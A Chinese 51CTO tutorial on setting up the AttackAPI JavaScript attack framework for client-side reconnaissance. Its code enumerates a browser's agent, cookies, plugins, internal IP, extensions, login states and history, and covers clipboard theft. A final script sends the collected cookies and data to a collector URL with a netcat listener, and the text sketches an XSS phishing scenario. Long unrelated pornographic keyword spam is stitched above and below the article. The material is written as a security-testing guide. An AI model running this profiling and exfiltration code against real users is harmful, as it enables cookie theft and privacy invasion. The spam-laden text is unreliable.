精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

精通JavaScript攻擊框架:AttackAPI環境搭設

原創
安全 應用安全
一種類型的安全專業浮現并變成主流利用機制時,供應廠商和個人就會開始發行框架和自動工具,來處理工具和測試過程。雖然供應廠商最初主要將精力放在AJAX審計工具方面,但是安全研究人員更關注的是連綿的系統邊界,以探索事實真相。

【51CTO.com 獨家特稿】多年來客戶端安全一直未引起人們的足夠重視,但是如今情況發生了急劇轉變,客戶端安全已經成為信息安全領域的焦點之一。Web惡意軟件、AJAX蠕蟲、瀏覽歷史暴破、登錄檢測、傀儡控制技術網絡端口掃描以及瀏覽器劫持等各種技術只是安全研究人員地下實驗室的部分技術,但是已經帶來了非常大的影響。

一種類型的安全專業浮現并變成主流利用機制時,供應廠商和個人就會開始發行框架和自動工具,來處理工具和測試過程。雖然供應廠商最初主要將精力放在AJAX審計工具方面,但是安全研究人員更關注的是連綿的系統邊界,以探索事實真相。

由于存在多種可能的攻擊矢量,Web應用程序安全社區也建立了多個框架來探測、利用安全漏洞,從而揭示Web 開發社區所面臨的種種問題。而本文將向大家介紹AttackAPI的詳細使用方法。

一、AttackAPI概述

AttackAPI是一個基于Web的攻擊構造庫,它可以結合PHP、JavaScript及其他客戶端和服務器端技術進行使用。AttackAPI有幾十個不同功能的模塊組成,這些模塊既可以從瀏覽器使用,也可以從JavaScript解釋器執行,例如 Mozilla Rhino。它的目標是為實現漏洞利用而提供一個簡單易用的接口,主要用于測試和驗證之用。

在開始研究AttackAPI子程序之前,我們先來做一些準備工作。首先,下載該庫,然后搭設一個測試環境,我們將在這個環境中開發大部分示例程序。為此,我們需要安裝、運行以下應用程序:
支持PHP 4.x或者更新的版本的HTTP服務器(Apache+PHP或者AppServ)

www.apache.org/
www.php.net/
www.appservnetwork.com/
從GNUCITIZEN下載最新的AttackAPI
www.gnucitizen.org/projects/attackapi
Mozilla的網絡瀏覽器Firefox
www.getfirefox.com
Firefox擴展Firebug,地址www.getfirebug.com/

啟動Apache HTTP 服務器并且確保已在正常運行中。 在網上,介紹這類任務文檔很多,在此不再贅述。然后,從GNUCITIZEN下載AttackAPI程序包 ,并且將其抽取到Web服務器的根文件夾中。例如,如果使用的是AppServ,那么可以將這些文件放在C:\AppServ\www\attackapi中。

確保運行的Firefox已經安裝了Firebug。我們之所以不辭勞苦的準備這些東西,是因為它們可以在將來為我們剩下許多力氣,當我們從Firebug的動態控制臺下做這些工作的時候,要比不停地保存和打開一些隨機的臨時文件要輕松得多。雖然我們這里使用的是Firefox,但是這里的例子照樣可以用在其它瀏覽器上,只需稍作修改即可。

做好這些初始設置后,打開Firefox,從localhost導航至AttackAPI文件夾,即http://localhost/attackapi。這時就會看到如圖1所示內容。

 

圖1

從AttackAPI的文件結構來到Build|Tests|firetest-interactive.htm,這個文件中包含了下面我們將用到的一些元素。因為我們不會對打開的頁面的HTML內容做任何修改,所以打開 Firebug,并調整控制臺使其擴展至整個屏幕。
確保位于Console 選項卡中,并輸入命令:dir(AttackAPI)。如果一切正常的話,就會看到如圖2所示的AttackAPI 文檔對象模型(DOM)結構。

 

圖2

在本文剩下部分中,我們將使用$A對象而不是AttackAPI來訪問和調用庫對象和方法。$A對象是AttackAPI的一個獨立的實例,并且包含更易使用的AttackAPI方法的快捷方式。 AttackAPI是一個結構化程度很高的庫,通過圖2可以看出,它還進一步分為AttackAPI.core(庫核心)、AttackAPI.dom(跨瀏覽器的方法)和AttackAPI.utils(跨解釋器的方法)。通過使用上面所說的約定,AttackAPI的base64編碼函數的完整路徑為$A.encodeBase64,是不是非常簡潔呀?!這樣輸入代碼的時候是不是省力氣了,所以說,懶惰是促進人類進步的主要動力之一。

由于我們需要輸入的代碼較多,所以建議使用更大的命令行,首先在“選項”下拉菜單中選擇“更大的命令行”選項,如同圖3所示。

 

圖3

這時命令行會出現在窗口的右側,如下圖所示:

 

圖4

因為我們要鍵入許多代碼,所以難免出現輸入錯誤。所以打開更大的命令行之后,改起來會更快、更好。
需要注意的是,我們可以使用Load AttackAPI 書簽將AttackAPI 加載到選擇的頁面上,尤其是當我們需要為某個站點開發利用程序,但是又不想通過Firebug修改該頁面的源代碼或者插入腳本標簽的時候格外有用。該bookmarklet可以是從www.gnucitizen.org/projects/load-attackapi-bookmarklet下載。現在開始研究AttackAPI的客戶端踩點功能。

#p#

二、客戶端踩點

攻擊者一旦控制了受害者的瀏覽器,他們首先要做的第一件事情就是弄清楚他們俘獲的到底是什么樣的客戶端和平臺。為達到這一目的,他們只需在Firebug的命令行中輸入下列命令便可:
console.log($A.getAgent() );
console.log($A.getPlatform() );
命令行窗口下方的“運行”按鈕,就會看到這兩個函數的執行結果,如下圖所示:

圖5

如您所見,瀏覽器類型和操作系統版本已經展現在我們眼前了——事情就是這么簡單!
然而,攻擊者能做的事情遠不止這些。在Firebug的命令行下輸入如下所示的兩行命令:
console.dir($A.getCookies() );
console.dir($A.getPlugins() );
命令行窗口下方的“運行”按鈕,就會看到這兩個函數的執行結果,如下圖所示:

 

圖6

GetCookies函數會檢索出所有可用的Cookie,注意,這里的getCookies函數是一個易于使用的JavaScript 對象,這樣我們就無需對DOM對象document.cookie 進行手動解析了。 與getCookies函數類似,getPlugins函數會列出目前已經安裝的所有瀏覽器插件;這個函數能夠運行在大多數瀏覽器上,但是Internet Explorer(IE)除外。

這里需要注意,如果客戶端使用的是IE的話,AttackAPI能夠訪問存儲在剪貼板中的數據:我們可以使用AttackAPI.dom.getClipboard來讀取剪貼板,并能使用AttackAPI.dom.setClipboard 函數來設置剪貼板。通常情況下,剪貼板會保存有攻擊者感興趣的內容,例如用戶有時候會復制粘貼他們的密碼。通過使用這項功能,攻擊者可以很輕松地竊取剪貼板中的數據,進而利用這些數據來控制用戶帳戶。

我們知道,攻擊者可以攻擊位于局域網內部的設備。為此,他們必須具有對局域網內部結構有一個很好的了解才行,對內部網絡圖范圍更應該有一個詳細的了解。他們可以做出以下假設,家庭用戶的地址范圍為192.168.0.0–192.168.1.0,邊界路由器地址為192.168.0.1或者192.168.1.1,而企業用戶位于10.0.0.0范圍內,因為這個地址范圍能夠容納更多的用戶。另一方面,在下列三個AttackAPI函數的幫助下攻擊者可以很輕松地獲得內部網絡信息:

console.log($A.getInternalIP() );
console.log($A.getInternalHostname() );
console.dir($A.getInternalNetworkInfo() );

命令行窗口下方的“運行”按鈕,就會看到這兩個函數的執行結果,如下圖所示:

圖7

攻擊者可以很輕松地使用以下命令推測出邊界路由器:

console.log(new String($A.getInternalIP() ).replace(/.\d+$/, ‘.1’) );
知道了這些,攻擊者可以針對它發動大量不同的攻擊,以確定它的類型和版本,并最終通過跨站點腳本攻擊(XSS)或者某些其他弱點來利用這個邊界路由器。盡管老練的攻擊者能夠輕松提出一個合理的猜測,然而,猜測畢竟只是猜測而已,它未必總是有效。下面的內容中,我們將要利用AttackAPI進行更多的網絡操作,但是現在我們只把精力集中在客戶端調查上。

對于AttackAPI來說,激動人心的功能并不在于獲取代理、平臺、cookies、插件和內部網絡信息,更多好戲還在后頭。只要簡單的調用一個函數,攻擊者就可以提取并掃描當前已經安裝的Firefox擴展:

$A.scanExtensions({onfound: function(signature) {
console.dir(signature);
}});
函數scanExtensions使用內置的特征數據庫(AttackAPI.dom.signatures)來調查可用的Firefox擴展。然而,您可以指定您自己的特征碼,如下所示:
$A.scanExtensions({onfound: function(signature) {
console.dir(signature);
}, signatures: [{name: ‘Customize Google’, url:
‘chrome://customizegoogle/skin/32×32.png’}]});

注意,通過了解已經安裝了哪些Firefox擴展有助于揭示某些用戶行為模式。老辣的社會工程人員可以用來發動成功攻擊。例如,如果如果客戶端已經安裝了FlickrFox、Picture2Life或者Flickrgethighrez擴展,那么他很可能具有一個Flickr帳戶。

如果在flickr.com 或者yahoo.com 上發現了XSS 安全漏洞,攻擊者就可以向這些用戶發送一封郵件,說他們的帳戶出了問題。并且讓這個郵件貌似來自他們使用的擴展。當他們確認該消息時,他們會被重定向至flickr.com 或者yahoo.com 的登錄頁面,這時他們會在此輸入其證書以便登錄。

這時,攻擊者就可以完全控制他們的證書,并且具有了這個在線身份所具有的一切權限。

利用AttackAPI來檢測一個用戶是否已經登錄Flickr站點非常簡單,只需用到scanStates函數和內部特征數據庫:

$A.scanStates({onfound: function(signature) {
console.dir(signature);
}});

就像函數scanExtensions一樣,您可以指定自己的特征碼,如下所示:

$A.scanStates({onfound: function(signature) {
console.dir(signature);
}, signatures: [name: ‘Flickr Logged In User’, url: ‘http://www.fl ickr.com/
account’, message: ‘syntax error’, line: 1}]});

欲了解如何為scanExtensios和scanStates函數編寫特征碼的更多信息,請訪問AttackAPI主頁,地址為www.gnucitizen.org/projects/attackapi。

迄今為止,我們已經看到即使對AttackAPI的工作原理沒有深入了解,也可以輕松地用它來完成的許多任務。我們這里要展示的最后一個函數將用來顯示客戶端瀏覽歷史。讓我們看看以下代碼:

$A.scanHistory({onfound: function(url) {
console.log(url);
}});

通過上述代碼,就可以查看最近訪問的位于AttackAPI特征數據庫中所有站點。就像其他掃描函數一樣,您可以指定自己的要掃描的瀏覽歷史列表,如下所示:

$A.scanHistory({onfound: function(url) {
console.log(url);
}, urls: [‘http://www.google.com’, ‘http://www.gnucitizen.org’]});

需要注意的是,雖然攻擊者可以將該技術用于惡意目的,但是有些情況下它也有好的一面。例如,為了調查取證,人們可以掃描大量用戶以識別訪問過可疑站點的個人。

讓我們看看如何使用上面所有這些函數來對用戶進行全面的調查。在代碼片斷之后,我們還列出了收集到的各種信息:
var data = {
agent: $A.getAgent(),
platform: $A.getPlatform(),
cookies: $A.getCookies(),
plugins: $A.getPlugins(),
ip: $A.getInternalIP(),
hostname: $A.getInternalHostname(),
extensions: [],
states: [],
history: []};
var completed = 0;
$A.scanExtensions({
onfound: function (signature) {
data.extensions.push(signature.name);
},
oncomplete: function () {
completed += 1;
}
});
$A.scanStates({
onfound: function (signature) {
data.states.push(signature.name);
},
oncomplete: function () {
completed += 1;
}
});
$A.scanHistory({
onfound: function (url) {
data.history.push(url);
},
oncomplete: function () {
completed += 1;
}
});
var tmr = window.setInterval(function () {
if (completed < 3)
return;
console.dir(data);
window.clearInterval(tmr);
}, 1000);

這段代碼最終通過利用AttackAPI進行全面的客戶端調。其中scanStates、scanHistory和scanextensions函數都需要一個回調參數(即onfound事件)來返回結果,這一點需要注意。記住,JavaScript程序不是線性的。為此,我們必須等待這些函數結束,然后繼續正常的程序執行路徑。

這個任務可以通過window.setInterval函數幫我們完成。setInterval函數被配置成檢查每秒完成的變量的數量。當這個數量達到3時,將收集到的信息顯示在屏幕上。

當攻擊者檢索這個信息時,他可能想要將該信息從客戶端輸送到某個存儲點以便做進一步的調查??紤]一下,當我們分析某個讀者屬于哪個用戶組時這些信息是多么的有用!這個信息不僅對市場營銷非常有用,而且對攻擊者的統計工具也是很有價值的。

取得客戶端到服務器的日期也是一個挑戰,不過AttackAPI利用一個單一的函數解決了所有瀏覽器兼容模式。下面看看我們是如何改寫客戶端調查代碼的:

var data = {
agent: $A.getAgent(),
platform: $A.getPlatform(),
cookies: $A.buildQuery($A.getCookies() ),
plugins: $A.getPlugins().join(‘,’),
ip: $A.getInternalIP(),
hostname: $A.getInternalHostname(),
extensions: [],
states: [],
history: []};
var completed = 0;
$A.scanExtensions({
onfound: function (signature) {
data.extensions.push(signature.name);
},
oncomplete: function () {
completed += 1;
}
});
$A.scanStates({
onfound: function (signature) {
data.states.push(signature.name);
},
oncomplete: function () {
completed += 1;
}
});
$A.scanHistory({
onfound: function (url) {
data.history.push(url);
},
oncomplete: function () {
completed += 1;
}
});
var tmr = window.setInterval(function () {
if (completed < 3)
return;
data.extensions = data.extensions.join(‘,’);
data.states = data.states.join(‘,’);
data.history = data.history.join(‘,’);
$A.transport({url: ‘http://localhost:8888/collect’, query: data});
window.clearInterval(tmr);
}, 1000);

如您所見,這里的代碼跟之前的非常相似,當然也有不同之處,首先我們確信所有數據都存儲為String對象。 數組項是連續的、用逗號隔離的列表,可以利用統一資源定位符(URL)查詢來導出各個對象。您可以很輕松地利用$A.buildQuery 函數來構造查詢。函數調用$A.buildQuery({name: ‘Fred’, lastName: ‘Johnson’});會導致name=Fred&lastName=Johnson。

回到我們的客戶端調查代碼,您可以很輕松地測試傳送機制。只需把NetCat設置成監聽狀態,如下所示。利用下列命令,我們將打開端口8888,并將信息輸出等級設為較大值,即輸出更為詳細的信息:
nc -l -p 8888 -vvv

您一旦在Firebug控制臺執行了這些JavaScript代碼,將會看到所有到達NetCat的數據都變成一個長長的URL編碼的字符串。當然,您可以使用任何類型的編碼(例如 Base64或者JSON),因為URL編碼是默認支持的,所以使用它的時候無需作任何變更。

#p#

三、小結

多年來客戶端安全一直未引起人們的足夠重視,但是如今情況發生了急劇轉變,客戶端安全已經成為信息安全領域的焦點之一。Web惡意軟件、AJAX蠕蟲、瀏覽歷史暴破、登錄檢測、傀儡控制技術網絡端口掃描以及瀏覽器劫持等各種技術只是安全研究人員地下實驗室的部分技術,但是已經帶來了非常大的影響。

一種類型的安全專業浮現并變成主流利用機制時,供應廠商和個人就會開始發行框架和自動工具,來處理工具和測試過程。雖然供應廠商最初主要將精力放在AJAX審計工具方面,但是安全研究人員更關注的是連綿的系統邊界,以探索事實真相。

由于存在多種可能的攻擊矢量,Web應用程序安全社區也建立了多個框架來探測、利用安全漏洞,從而揭示Web 開發社區所面臨的種種問題。而本文將向大家介紹AttackAPI測試環境的搭設以及客戶端踩點的方法進行了詳盡的介紹,下一篇我們將對AttackAPI的其他用法做詳盡的介紹。

【51CTO.COM 獨家特稿,轉載請注明出處及作者!】

【編輯推薦】

  1. 黑客如何利用Javascript逃避檢測入侵臺式電腦
  2. Adobe Acrobat和Reader被找出Javascript漏洞
  3. 分析ARP病毒是如何利用的Javascript技術的
責任編輯:王文文 來源: 51CTO.com
相關推薦

2009-02-12 18:02:15

2009-06-08 16:45:00

精通StrutsTiles

2021-04-07 09:52:46

JavaScript函數劫持攻擊

2021-04-01 10:16:01

EmacsJavaScript elisp

2021-01-13 11:25:12

JavaScript閉包函數

2015-05-06 10:02:26

2022-02-09 11:02:16

JavaScript前端框架

2021-10-17 22:40:51

JavaScript開發 框架

2015-05-18 13:51:08

2009-02-24 09:24:23

2021-06-15 11:10:00

JavaScript框架語言

2021-02-14 10:03:41

網絡攻擊零日漏洞SolarWinds

2013-05-31 02:30:37

2013-07-08 14:45:52

2013-04-11 14:28:37

2013-11-06 09:39:30

JavaScriptMVC框架

2024-01-05 07:43:04

2019-10-21 09:29:00

JavaScriptHTML數據庫

2022-01-06 22:04:03

JavaScript語言開發

2017-06-30 12:53:50

Javascript框架Vue vs Reac
點贊
收藏

51CTO技術棧公眾號

国产免费区一区二区三视频免费 | 国产一区二区激情| 99精品免费在线观看| 国产一二三区在线| 久久er99精品| 欧美日韩国产91| 人妻丰满熟妇av无码久久洗澡| 外国成人直播| 亚洲色图丝袜美腿| 国产一区二区三区四区五区加勒比 | 国产伦精品一区二区三区在线播放| 亚洲成人高清在线| 亚洲国产精品一区二区第四页av| 午夜精品一二三区| 首页国产欧美日韩丝袜| 欧美成人精品一区二区三区| 波多野结衣福利| 日本在线视频一区二区三区| 欧美午夜久久久| 五月天色婷婷综合| 久久久久久女乱国产| 国产一区在线观看视频| 日韩美女视频在线观看| 麻豆成人在线视频| 成人免费看片39| 亚洲国产精品大全| 中文字幕在线视频一区二区三区| 欧美另类老肥妇| 亚洲免费在线看| 日本一区二区在线视频| 东京干手机福利视频| 麻豆精品视频在线| 国产97免费视| 亚洲精品视频在线观看免费视频| 国产精品99一区二区三区| 亚洲另类欧美自拍| 亚洲麻豆一区二区三区| 国产视频一区二| 欧美日韩国产123区| 亚洲中文字幕久久精品无码喷水| xxx性欧美| 亚洲精品国产一区二区精华液 | 色窝窝无码一区二区三区成人网站| 美女国产一区二区| 国产精品aaa| 欧美性猛交bbbbb精品| 99热免费精品在线观看| 欧美激情视频免费观看| 精品自拍偷拍视频| 欧美电影免费播放| 色婷婷综合久久久久| 免费观看a级片| 九色成人国产蝌蚪91| 亚洲精品国产精品乱码不99按摩| 无码国产精品一区二区免费式直播| 91九色成人| 在线成人午夜影院| 6080国产精品| 老司机亚洲精品一区二区| 在线观看91av| 亚洲天堂一区二区在线观看| 成人在线啊v| 欧美一区二区三区电影| 久久人人爽人人片| 伊人久久噜噜噜躁狠狠躁| 91精品国产综合久久久蜜臀粉嫩 | 亚洲国产精品小视频| 国产又粗又猛又色| 亚欧洲精品视频在线观看| 日韩大陆欧美高清视频区| 亚洲av无码成人精品国产| 精品中文字幕一区二区三区av| 亚洲精品视频免费在线观看| 亚洲AV无码国产成人久久| 国产精品嫩草影院在线看| 国产亚洲欧美另类中文| 亚洲精品自拍视频在线观看| 先锋资源久久| 欧美极品第一页| 91午夜视频在线观看| 三级不卡在线观看| 国产女同一区二区| 国产成人三级在线播放| 成人小视频免费观看| 免费精品视频一区二区三区| 成人在线观看一区| 亚洲精品免费在线| 免费一级特黄特色毛片久久看| 国产精欧美一区二区三区蓝颜男同| 色噜噜狠狠色综合欧洲selulu| 亚洲欧美自偷自拍另类| 日本精品视频| 亚洲男人天堂2019| 国产老头老太做爰视频| 最新日韩欧美| 欧美一性一乱一交一视频| 一级全黄少妇性色生活片| 国产成人av电影在线播放| 免费看成人片| 高清全集视频免费在线| 精品成人av一区| 国产精品v日韩精品v在线观看| 免费一级欧美在线大片| 亚洲精品永久免费| 日韩欧美综合视频| 小嫩嫩精品导航| 91在线免费看网站| 日韩av免费观影| 亚洲精品免费在线播放| 亚洲人成色77777| 深夜激情久久| 在线视频精品一| 久久精品女人毛片国产| 蜜桃免费网站一区二区三区| 国产高清自拍99| 91高清在线视频| 欧美日韩国产页| 亚洲天堂av一区二区三区| 久久最新网址| 欧美国产日韩一区| 夜夜爽8888| 91丨porny丨户外露出| 五月天综合婷婷| 欧美亚洲大片| 日韩av在线免费看| 农村黄色一级片| 毛片av一区二区| 日本一区二区三区www| 国产资源在线观看入口av| 制服.丝袜.亚洲.中文.综合| 久久久久久久久久久久久久久| 欧美日韩一区二区国产| 国产日韩在线亚洲字幕中文| 男人久久精品| 欧美日韩激情视频8区| 一级黄色大片免费看| 99精品美女| 国产精品久久久一区| 青青操在线视频| 亚洲va欧美va天堂v国产综合| 国产探花一区二区三区| 婷婷中文字幕一区| 成人国内精品久久久久一区| 91看片在线观看| 欧美视频在线观看一区| 成人激情五月天| 久久亚洲精品伦理| 免费国产在线精品一区二区三区| 国产传媒在线观看| 日韩黄色av网站| 日韩av无码中文字幕| 北条麻妃国产九九精品视频| www.国产在线视频| 超碰97久久国产精品牛牛| 欧美成人精品一区二区| 精品国精品国产自在久不卡| 一区二区三区 在线观看视频| 成人免费黄色av| 欧美天堂亚洲电影院在线观看 | 97免费观看视频| 国产精品女同一区二区三区| 午夜免费看视频| 99久久夜色精品国产亚洲96| 成人在线视频网| 国产精品剧情一区二区在线观看| 69堂成人精品免费视频| 国产1区2区3区4区| www.亚洲色图.com| 日韩视频免费在线播放| 不卡在线一区二区| 国产欧美最新羞羞视频在线观看| 久草免费在线| 精品国产乱码久久久久久浪潮| 91蜜桃视频在线观看| 2020国产精品自拍| 亚洲欧美自拍另类日韩| 综合久久综合| 久久大片网站| 国产精品xxx| 欧美精品一区二区三区国产精品| www.亚洲欧美| 福利视频一区二区| аⅴ天堂中文在线网| 国内精品国产成人| 久久久性生活视频| 欧美手机视频| 成人av蜜桃| 成人自拍av| 欧美精品在线免费| 亚洲人视频在线观看| 欧美综合亚洲图片综合区| 综合五月激情网| 久久亚洲一区二区三区四区| 天堂av8在线| 在线看片成人| 亚洲高清在线播放| 白嫩白嫩国产精品| 国产精品欧美风情| 丁香花高清在线观看完整版| 一本一本久久a久久精品牛牛影视| 国产人妻精品一区二区三| 天天操天天综合网| 久久99久久99精品免费看小说| 不卡av在线免费观看| 艹b视频在线观看| 亚洲三级观看| 最近中文字幕免费mv| 婷婷综合福利| 97视频热人人精品| 日本精品另类| 97久久精品人搡人人玩| 日韩在线免费电影| 日韩av一区二区在线| 国产精品久久久久毛片| 欧美日韩亚洲一区二区| 美女福利视频在线观看| 日本一区二区三区国色天香| 国产极品一区二区| 国产酒店精品激情| 欧美黑人又粗又大又爽免费| 亚洲三级视频| 路边理发店露脸熟妇泻火| 国产中文精品久高清在线不| 国产伦精品一区二区三毛| 亚洲精品aa| 国产精品久久久久久久av电影| 97人人爽人人澡人人精品| 久热精品视频在线观看| 8888四色奇米在线观看| 亚洲日本成人女熟在线观看 | 51一区二区三区| 78色国产精品| sm在线观看| 欧美激情乱人伦一区| 国产精品久久久久久福利| 主播福利视频一区| 国产在线色视频| 亚洲欧美制服第一页| 五月激情婷婷网| 亚洲国产欧美一区二区三区同亚洲| 精品人妻午夜一区二区三区四区 | 九九综合久久| 欧美极品色图| 一呦二呦三呦国产精品| 久久国产主播精品| 日韩成人午夜| 精品久久久久久中文字幕动漫| 国产精品对白久久久久粗| 99精品国产一区二区| 天堂久久av| 99在线看视频| 66精品视频在线观看| 超碰97国产在线| swag国产精品一区二区| 国产精品9999久久久久仙踪林| jizz18欧美18| 久久亚洲综合网| 亚洲专区视频| 欧美日韩一区二区视频在线| 国产一区2区| 亚洲巨乳在线观看| 久久精品影视| 台湾无码一区二区| 亚洲二区免费| 北条麻妃69av| 日本成人中文字幕| 伊人色在线视频| 丁香婷婷深情五月亚洲| 岛国精品资源网站| 久久麻豆一区二区| 影音先锋男人看片资源| 亚洲三级电影网站| 国产精品1234区| 欧美视频专区一二在线观看| 五月婷婷激情五月| 3atv在线一区二区三区| 亚洲精品久久久狠狠狠爱| 日韩电影第一页| 中文字幕在线观看日本| 欧美美最猛性xxxxxx| 色是在线视频| 国产主播喷水一区二区| 96sao在线精品免费视频| 欧美精品一区二区三区在线看午夜| 欧美一区2区| 成年丰满熟妇午夜免费视频| 一本久久知道综合久久| 三上悠亚在线一区| 成人毛片老司机大片| 欧美黄色一级生活片| 亚洲美女区一区| 97久久久久久久| 欧美群妇大交群中文字幕| 国产77777| 一区二区成人av| 欧美性猛片xxxxx免费中国| 日本欧美精品在线| 国产一区二区| 欧洲成人一区二区| 欧美天天在线| 羞羞的视频在线| 91蜜桃网址入口| 99久久99久久精品国产| 日韩欧美国产一区二区| 99久久精品国产一区色| 亚洲人成网站色ww在线| 欧美aaaxxxx做受视频| 国产精品一区二区久久国产| 国产精品流白浆在线观看| 亚洲一区二区三区欧美| 亚洲深夜福利| 日本黄色www| 国产精品免费av| av资源免费观看| 欧美草草影院在线视频| 在线观看免费网站黄| 4p变态网欧美系列| 在线日韩成人| 2025韩国大尺度电影| 日韩激情在线观看| 屁屁影院国产第一页| 亚洲激情自拍视频| 在线免费观看日韩视频| 亚洲男女自偷自拍图片另类| а_天堂中文在线| 91成人免费在线观看| 久久理论电影| 日本新janpanese乱熟| 91亚洲精品久久久蜜桃| 久久精品www人人爽人人| 4hu四虎永久在线影院成人| 精品乱码一区二区三四区视频| 亚州av一区二区| 136福利精品导航| 国产一区一区三区| 久久66热re国产| 日本一卡二卡在线播放| 色综合久久六月婷婷中文字幕| 免费观看毛片网站| 欧美日韩ab片| 精品一区二区三区中文字幕在线| 亚洲在线欧美| 理论电影国产精品| 毛片久久久久久| 欧美视频一区二区在线观看| 国产在线观看高清视频| 国产97免费视| 国产探花在线精品| 精品日韩久久久| 中文字幕成人av| 中文字幕日韩三级| 中文字幕亚洲情99在线| 国产精品黄色片| 一区二区三区国| 精品亚洲国产成人av制服丝袜| 一本一本久久a久久| 欧美人狂配大交3d怪物一区| 国产传媒在线播放| 肥熟一91porny丨九色丨| 一区久久精品| 亚洲国产精品成人综合久久久| 欧美视频13p| 国产在线超碰| 国产专区欧美专区| 亚洲精品成人无限看| 亚洲天堂网站在线| 亚洲综合色视频| 先锋av资源站| 国产精品99蜜臀久久不卡二区| 欧美成人milf| 乱码一区二区三区| 欧美视频在线观看 亚洲欧| 精品三级久久久久久久电影聊斋| 国产精品美女无圣光视频| 国产精品99视频| 无码一区二区精品| 欧美在线不卡视频| 最新日本在线观看| 久久精品欧美| 蜜乳av一区二区三区| 91porn在线视频| 精品香蕉一区二区三区| 激情亚洲小说| 东北少妇不带套对白| 久久精品一二三| 国产欧美综合视频| 2019av中文字幕| 日韩免费特黄一二三区| 一级全黄裸体片| 色94色欧美sute亚洲线路二| 成人三级网址| 日本婷婷久久久久久久久一区二区 | 精品亚洲免a| 怡红院亚洲色图| 五月开心婷婷久久| 色三级在线观看| 久久综合中文色婷婷| 经典一区二区三区| 国产超碰人人爽人人做人人爱| 久久久av免费|